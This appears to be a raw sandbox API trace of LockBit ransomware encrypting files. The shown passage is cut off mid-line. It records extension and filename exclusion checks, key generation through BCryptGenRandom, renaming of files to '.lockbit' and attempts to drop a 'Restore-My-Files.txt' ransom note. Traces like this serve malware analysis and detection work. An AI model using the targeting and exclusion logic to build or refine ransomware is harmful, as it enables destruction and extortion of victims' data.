[0110.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.268] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.269] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.270] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.lockbit") returned 72 [0110.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.271] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.271] malloc (_Size=0x40068) returned 0x3ef0008 [0110.271] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2952) returned 1 [0110.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.272] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0110.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.278] malloc (_Size=0xa6) returned 0x77d800 [0110.278] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.279] free (_Block=0x77d800) [0110.279] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.279] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.279] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.279] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2708, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00449_.WMF", cAlternateFileName="")) returned 1 [0110.279] lstrcmpiW (lpString1=".", lpString2="DD00449_.WMF") returned -1 [0110.279] lstrcmpiW (lpString1="..", lpString2="DD00449_.WMF") returned -1 [0110.279] PathFindExtensionW (pszPath="DD00449_.WMF") returned=".WMF" [0110.279] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.279] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.280] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.280] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00449_.WMF") returned 1 [0110.281] lstrcmpiW (lpString1="ntldr", lpString2="DD00449_.WMF") returned 1 [0110.281] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00449_.WMF") returned 1 [0110.281] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00449_.WMF") returned -1 [0110.281] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00449_.WMF") returned -1 [0110.281] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00449_.WMF") returned 1 [0110.281] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00449_.WMF") returned 1 [0110.281] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.281] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned=".WMF" [0110.281] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.281] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.281] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.282] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.283] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.283] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.283] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.lockbit") returned 72 [0110.283] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.284] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.284] malloc (_Size=0x40068) returned 0x3ef0008 [0110.284] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9992) returned 1 [0110.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.285] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.289] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.289] malloc (_Size=0xa6) returned 0x77d800 [0110.289] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.292] free (_Block=0x77d800) [0110.292] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.292] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.293] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac04fe00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac04fe00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00687_.WMF", cAlternateFileName="")) returned 1 [0110.293] lstrcmpiW (lpString1=".", lpString2="DD00687_.WMF") returned -1 [0110.293] lstrcmpiW (lpString1="..", lpString2="DD00687_.WMF") returned -1 [0110.293] PathFindExtensionW (pszPath="DD00687_.WMF") returned=".WMF" [0110.293] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.293] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.294] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.294] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00687_.WMF") returned 1 [0110.295] lstrcmpiW (lpString1="ntldr", lpString2="DD00687_.WMF") returned 1 [0110.295] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00687_.WMF") returned 1 [0110.295] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00687_.WMF") returned -1 [0110.295] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00687_.WMF") returned -1 [0110.295] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00687_.WMF") returned 1 [0110.295] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00687_.WMF") returned 1 [0110.295] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.295] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned=".WMF" [0110.295] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.295] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.295] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.296] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.296] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.lockbit") returned 72 [0110.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.297] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.297] malloc (_Size=0x40068) returned 0x3ef0008 [0110.297] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=20784) returned 1 [0110.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.298] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.303] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.303] malloc (_Size=0xa6) returned 0x77d800 [0110.303] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.305] free (_Block=0x77d800) [0110.305] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.305] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.306] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcb1e00, ftCreationTime.dwHighDateTime=0x1bd4b37, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcb1e00, ftLastWriteTime.dwHighDateTime=0x1bd4b37, nFileSizeHigh=0x0, nFileSizeLow=0x600c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00705_.WMF", cAlternateFileName="")) returned 1 [0110.306] lstrcmpiW (lpString1=".", lpString2="DD00705_.WMF") returned -1 [0110.306] lstrcmpiW (lpString1="..", lpString2="DD00705_.WMF") returned -1 [0110.306] PathFindExtensionW (pszPath="DD00705_.WMF") returned=".WMF" [0110.306] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.306] lstrcmpiW (lpString1=".adv", 